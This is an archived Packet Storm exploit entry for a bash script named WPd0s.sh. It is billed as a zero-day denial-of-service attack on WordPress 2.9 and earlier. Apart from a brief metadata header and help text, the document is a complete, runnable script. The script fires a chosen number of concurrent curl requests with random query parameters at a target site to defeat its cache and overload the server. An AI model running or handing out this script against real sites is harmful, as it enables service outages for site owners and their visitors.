Wordpress 2.9 Denial Of Service

2010-01-01T00:00:00
ID PACKETSTORM:84591
Type packetstorm
Reporter emgent
Modified 2010-01-01T00:00:00

Description

                                        
                                            `#!/bin/bash  
#  
# Copyright (C) 2009 Emanuele Gentili < emgent@backtrack.it >  
#  
# This program is released under the terms of the GNU General Public License  
# (GPL), which is distributed with this software in the file "COPYING".  
# The GPL specifies the terms under which users may copy and use this software.  
#  
# WPd0s.sh  
# This is a 0day DOS issue for Wordpress Core that use cache stressing with random  
# parameter on multime requests.  
#  
  
show_help(){  
echo ""  
echo " 2009 (C) WPd0s.sh - 0day Wordpress DOS <= 2.9"  
echo ""  
echo " --usage show the exploit Usage"  
echo " --prereq show the exploit Prerequisites"  
echo " --credits show the exploit Credits"  
echo " --help show the Help"  
echo ""  
echo "Emanuele Gentili <emgent@backtrack.it>"  
}  
  
show_credits(){  
echo ""  
echo " Emanuele 'emgent' Gentili"  
echo " http://www.backtrack.it/~emgent/"  
echo " emgent @ backtrack.it"  
echo ""  
}  
  
show_prereq(){  
echo ""  
echo " 2009 (C) WPd0s.sh - 0day Wordpress DOS <= 2.9"  
echo ""  
echo " Prerequeisites:"  
echo " Bash (yeah because is cool.)"  
echo " Curl"  
echo ""  
echo " Emanuele Gentili <emgent@backtrack.it>"  
}  
  
show_usage(){  
echo ""  
echo " 2009 (C) WPd0s.sh - 0day Wordpress DOS <= 2.9"  
echo ""  
echo " usage $0 --host http://localhost/wordpress/ --requests 1000"  
echo ""  
echo " Emanuele Gentili <emgent@backtrack.it>"  
}  
  
  
# Bash  
while [[ $# != 0 ]]; do  
arg_name=$1; shift  
case "$arg_name" in  
--help|-?|-h) show_help; exit 0;;  
--credits) show_credits; exit 0;;  
--usage) show_usage; exit 0;;  
--prereq) show_prereq; exit 0;;  
--host) host=$1; shift;;  
--requests) requests=$1; shift;;  
*) echo "invalid option: $1"; show_help;exit 1;;  
esac  
done  
  
[ -z "$host" ] && { show_help; exit 1; }  
  
for random in `seq 1 $requests`; do  
curl -A Firefox -o --url "$host/?cat=2&d0s=1&d0s=$random" > /dev/null 2>&1 &  
done  
  
# 2009-12-30 enJoy.  
  
`